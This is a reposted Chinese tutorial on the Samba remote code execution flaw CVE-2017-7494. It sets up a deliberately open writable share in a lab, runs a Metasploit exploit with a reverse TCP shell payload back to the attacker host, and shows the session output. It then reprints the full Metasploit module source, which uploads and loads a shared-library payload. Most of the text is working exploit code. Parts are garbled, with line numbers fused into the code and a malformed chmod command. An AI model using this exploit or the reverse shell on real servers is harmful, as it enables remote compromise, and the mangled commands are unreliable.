Home>Article>Operation and Maintenance> Detailed example of Samba remote code execution vulnerability
Samba是在Linux和UNIX系统上实现SMB协议的一个软件。
2017年5月24日Samba发布了4.6.4版本,中间修复了一个严重的远程代码执行漏洞,漏洞编号CVE-2017-7494,漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
360网络安全中心 和 360信息安全部的Gear Team第一时间对该漏洞进行了分析,确认属于严重漏洞,可以造成远程代码执行。
漏洞简述
▼▼
漏洞编号:CVE-2017-7494
危害等级:严重
影响版本:Samba 3.5.0 和包括4.6.4/4.5.10/4.4.14中间版本
漏洞描述:2017年5月24日Samba发布了4.6.4版本,修复了一个严重的远程代码执行漏洞,该漏洞影响了Samba 3.5.0 之后到4.6.4/4.5.10/4.4.14中间的所有版本。
技术分析
▼▼
如官方所描述,该漏洞只需要通过一个可写入的Samba用户权限就可以提权到samba所在服务器的root权限(samba默认是root用户执行的)。
搭建Debian和kali两个虚拟机: 攻击机:kali (192.168.217.162); 靶机:debian (192.168.217.150)。
1、首先,下载安装samba服务器
# apt-get install samba
2、在debian下创建一个共享目录,我这里为/mnt/shared
# mkdir /mnt/shared
3、配置samba服务器的配置文件/etc/samba/smb.conf,在最后添加:
[shared] comment = 'Share for work' path= /mnt/shared guest ok = yes public = yes writable = yes create mask = 0777
4、设置/mnt/shared权限
# chmod –R /mnt/sspaned
5、重启samba服务
# /etc/init.d/samba restart
打开kali终端进入到metasploit的exploit目录下的linux文件夹,并新建一个smb文件夹,将攻击脚本放入其中:
# cd /usr/share/metasploit-framework/modules/exploits/linux # mkdir smb # wget
运行metasploit,开始进行攻击(攻击脚本被我重命名为(cve-2017-7494.rb)
# msfconsole msf > use exploit/linux/smb/cve-2017-7494 msf exploit(cve-2017-7494) > set rhost 192.168.217.150 rhost => 192.168.217.150 msf exploit(cve-2017-7494) > set payload linux/x64/shell/reverse_tcp payload => linux/x64/shell/reverse_tcp msf exploit(cve-2017-7494) > set lhost 192.168.217.162 rhost => 192.168.217.162 msf exploit(cve-2017-7494) > run [*] Started reverse TCP handler on 192.168.217.162:4444 [*] 192.168.217.150:445 - Using location \\192.168.217.150\shared\ for the path [*] 192.168.217.150:445 - Payload is stored in //192.168.217.150/shared/ as WzyvkESS.so [*] 192.168.217.150:445 - Trying location /volume1/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume1/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume2/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /volume3/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/SHARED/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /shared/Shared/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/WzyvkESS.so... [*] 192.168.217.150:445 - Trying location /mnt/shared/WzyvkESS.so... [*] Sending stage (38 bytes) to 192.168.217.150 [*] Command shell session 2 opened (192.168.217.162:4444 -> 192.168.217.150:56540) at 2017-05-26 01:17:48 -0400 id uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) ifconfig eth0 Link encap:Ethernet HWaddr 00:0c:29:6e:9a:4a inet addr:192.168.217.150 Bcast:192.168.217.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe6e:9a4a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:6769 errors:0 dropped:0 overruns:0 frame:0 TX packets:700 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:479898 (468.6 KiB) TX bytes:102796 (100.3 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:35 errors:0 dropped:0 overruns:0 frame:0 TX packets:35 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:3557 (3.4 KiB) TX bytes:3557 (3.4 KiB) whoami nobody
POC:
1 ## 2 # This module requires Metasploit: 3 # Current source: 4 ## 5 6 class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client def initialize(info = {}) super(update_info(info, 'Name' => 'Samba is_known_pipename() Arbitrary Module Load', 7 'Description' => %q{ 8 This module triggers an arbitrary shared library load vulnerability 9 in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module 10 requires valid credentials, a writeable folder in an accessible share, 11 and knowledge of the server-side path of the writeable folder. In 12 some cases, anonymous access combined with common filesystem locations 13 can be used to automatically exploit this vulnerability. 14 }, 15 'Author' => 16 [ 17 'steelo', # Vulnerability Discovery 18 'hdm', # Metasploit Module 19 ], 20 'License' => MSF_LICENSE, 21 'References' => 22 [ 23 [ 'CVE', '2017-7494' ], 24 [ 'URL', '' ], 25 ], 26 'Payload' => 27 { 28 'Space' => 9000, 29 'DisableNops' => true 30 }, 31 'Platform' => 'linux', 32 # 33 # Targets are currently limited by platforms with ELF-SO payload wrappers 34 # 35 'Targets' => 36 [ 37 [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ], 38 [ 'Linux x86', { 'Arch' => ARCH_X86 } ], 39 [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ], 40 # [ 'Linux MIPS', { 'Arch' => MIPS } ], 41 ], 42 'Privileged' => true, 43 'DisclosureDate' => 'Mar 24 2017', 44 'DefaultTarget' => 2)) 45 46 register_options( 47 [ 48 OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']), 49 OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']), 50 OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']), 51 ]) 52 end 53 54 55 def generate_common_locations 56 candidates = [] 57 if datastore['SMB_SHARE_BASE'].to_s.length > 0 58 candidates << datastore['SMB_SHARE_BASE'] 59 end 60 61 %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name| 62 candidates << base_name 63 candidates << [base_name, @share] 64 candidates << [base_name, @share.downcase] 65 candidates << [base_name, @share.upcase] 66 candidates << [base_name, @share.capitalize] 67 candidates << [base_name, @share.gsub(" ", "_")] 68 end 69 70 candidates.uniq 71 end 72 73 def enumerate_directories(share) 74 begin 75 self.simple.connect("\\\\#{rhost}\\#{share}") 76 stuff = self.simple.client.find_first("\\*") 77 directories = [""] 78 stuff.each_pair do |entry,entry_attr| 79 next if %W{. ..}.include?(entry) 80 next unless entry_attr['type'] == 'D' 81 directories << entry end return directories rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e 82 vprint_error("Enum #{share}: #{e}") 83 return nil 84 85 ensure 86 if self.simple.shares["\\\\#{rhost}\\#{share}"] 87 self.simple.disconnect("\\\\#{rhost}\\#{share}") 88 end 89 end 90 end 91 92 def verify_writeable_directory(share, directory="") 93 begin 94 self.simple.connect("\\\\#{rhost}\\#{share}") 95 96 random_filename = Rex::Text.rand_text_alpha(5)+".txt" 97 filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}" 98 99 wfd = simple.open(filename, 'rwct')100 wfd << Rex::Text.rand_text_alpha(8) wfd.close simple.delete(filename) return true rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e101 vprint_error("Write #{share}#{filename}: #{e}")102 return false103 104 ensure105 if self.simple.shares["\\\\#{rhost}\\#{share}"]106 self.simple.disconnect("\\\\#{rhost}\\#{share}")107 end108 end109 end110 111 def share_type(val)112 [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]113 end114 115 def enumerate_shares_lanman116 shares = []117 begin118 res = self.simple.client.trans(119 "\\PIPE\\LANMAN",120 (121 [0x00].pack('v') +122 "WrLeh\x00" +123 "B13BWz\x00" +124 [0x01, 65406].pack("vv")125 ))126 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e127 vprint_error("Could not enumerate shares via LANMAN")128 return []129 end130 if res.nil?131 vprint_error("Could not enumerate shares via LANMAN")132 return []133 end134 135 lerror, lconv, lentries, lcount = res['Payload'].to_s[136 res['Payload'].v['ParamOffset'],137 res['Payload'].v['ParamCount']138 ].unpack("v4")139 140 data = res['Payload'].to_s[141 res['Payload'].v['DataOffset'],142 res['Payload'].v['DataCount']143 ]144 145 0.upto(lentries - 1) do |i|146 sname,tmp = data[(i * 20) + 0, 14].split("\x00")147 stype = data[(i * 20) + 14, 2].unpack('v')[0]148 scoff = data[(i * 20) + 16, 2].unpack('v')[0]149 scoff -= lconv if lconv != 0150 scomm,tmp = data[scoff, data.length - scoff].split("\x00")151 shares << [ sname, share_type(stype), scomm] end shares end def probe_module_path(path) begin simple.create_pipe(path) rescue Rex::Proto::SMB::Exceptions::ErrorCode => e152 vprint_error("Probe: #{path}: #{e}")153 end154 end155 156 def find_writeable_path(share)157 subdirs = enumerate_directories(share)158 return unless subdirs159 160 if datastore['SMB_FOLDER'].to_s.length > 0161 subdirs.unshift(datastore['SMB_FOLDER'])162 end163 164 subdirs.each do |subdir|165 next unless verify_writeable_directory(share, subdir)166 return subdir167 end168 169 nil170 end171 172 def find_writeable_share_path173 @path = nil174 share_info = enumerate_shares_lanman175 if datastore['SMB_SHARE_NAME'].to_s.length > 0176 share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']177 end178 179 share_info.each do |share|180 next if share.first.upcase == 'IPC$'181 found = find_writeable_path(share.first)182 next unless found183 @share = share.first184 @path = found185 break186 end187 end188 189 def find_writeable190 find_writeable_share_path191 unless @share && @path192 print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")193 fail_with(Failure::NoTarget, "No matching target")194 end195 print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")196 end197 198 def upload_payload199 begin200 self.simple.connect("\\\\#{rhost}\\#{@share}")201 202 random_filename = Rex::Text.rand_text_alpha(8)+".so"203 filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"204 wfd = simple.open(filename, 'rwct')205 wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform, payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}206 )207 wfd.close208 209 @payload_name = random_filename210 return true211 212 rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e213 print_error("Write #{@share}#{filename}: #{e}")214 return false215 216 ensure217 if self.simple.shares["\\\\#{rhost}\\#{@share}"]218 self.simple.disconnect("\\\\#{rhost}\\#{@share}")219 end220 end221 end222 223 def find_payload224 print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")225 226 # Reconnect to IPC$227 simple.connect("\\\\#{rhost}\\IPC$")228 229 #230 # In a perfect world we would find a way make IPC$'s associated CWD231 # change to our share path, which would allow the following code:232 #233 # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")234 #235 236 # Until we find a better way, brute force based on common paths237 generate_common_locations.each do |location|238 target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')239 print_status("Trying location #{target}...")240 probe_module_path(target)241 end242 end243 244 def exploit245 # Setup SMB246 connect247 smb_login248 249 # Find a writeable share250 find_writeable251 252 # Upload the shared library payload253 upload_payload254 255 # Find and execute the payload from the share256 find_payload rescue Rex::StreamClosedError257 258 # Shutdown259 disconnect260 end261 262 end
The above is the detailed content of Detailed example of Samba remote code execution vulnerability. For more information, please follow other related articles on the PHP Chinese website!